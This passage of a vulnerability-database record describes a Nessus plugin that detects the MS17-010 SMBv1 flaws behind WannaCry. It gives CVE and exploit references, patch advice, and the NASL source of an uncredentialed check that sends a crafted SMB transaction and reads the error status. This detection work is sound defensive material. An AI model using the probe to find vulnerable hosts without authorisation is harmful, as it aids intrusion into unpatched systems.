WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?8dcab5e4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?68fc8eff", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?4c7e0cf3"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:59:25", "history": [], "viewCount": 7142, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "metasploit", "idList": 
["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42030"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": 
"symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-11T13:59:25", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": 
"2021-08-11T13:59:25", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. 
An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:59:25", "differentElements": ["vpr"], "edition": 7}, {"bulletin": {"id": "MS17-010.NASL", "hash": "9f27d1c3c853148fb2dc39ebb0f4d8c6", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?d9f569cf", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?234f8ef8", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?321523eb", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-12T12:17:27", "history": [], "viewCount": 7144, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": 
["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96704", 
"SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}], "modified": "2021-08-12T12:17:27", "rev": 2}, "score": {"value": 8.0, 
